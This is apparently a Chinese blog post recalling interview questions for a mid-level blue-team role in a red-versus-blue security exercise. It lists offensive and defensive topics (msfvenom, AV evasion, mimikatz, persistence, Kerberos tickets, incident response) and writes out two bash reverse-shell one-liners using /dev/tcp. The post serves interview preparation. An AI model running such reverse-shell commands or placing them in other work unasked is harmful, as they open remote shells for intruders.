【面试】记一次HVV蓝队中级(面试题)

使用过安全设备吗？使用过程中发现过真实攻击行为吗？

SRC经验

网络攻防CTF经历

Web OWasp Top10

常见webshell特征(内存马特征)

Goby在用什么版本?(这是没想到的)

Sqlmap参数

Burpsuite常用插件

MSF生成木马命令行(msfvenom 这问题也是我没想到的)

动态免杀(这里要补一下了，不太熟悉)

mimikaze使用

CS插件使用过那些

Linux系统弹shell命令(bash命令)

bash -i >& /dev/tcp/127.0.0.1/8080 0>&1
/bin/bash -i > /dev/tcp/127.0.0.1/8080 0<& 2>&1

横向移动思路

应急响应了解吗(流程，想法，思路)

一台机器装不了杀软，怎么进行排查？(手动排查)

自己打的内网靶场多吗？

权限维持思路？

金银票据区别？

自己写过的EXP多吗，使用那些库？

钓鱼邮件(构造思路以及分析思路)

反制思路

总结

动态免杀方面需要补一下、应急响应方面知识没有构成系统，讲的有点乱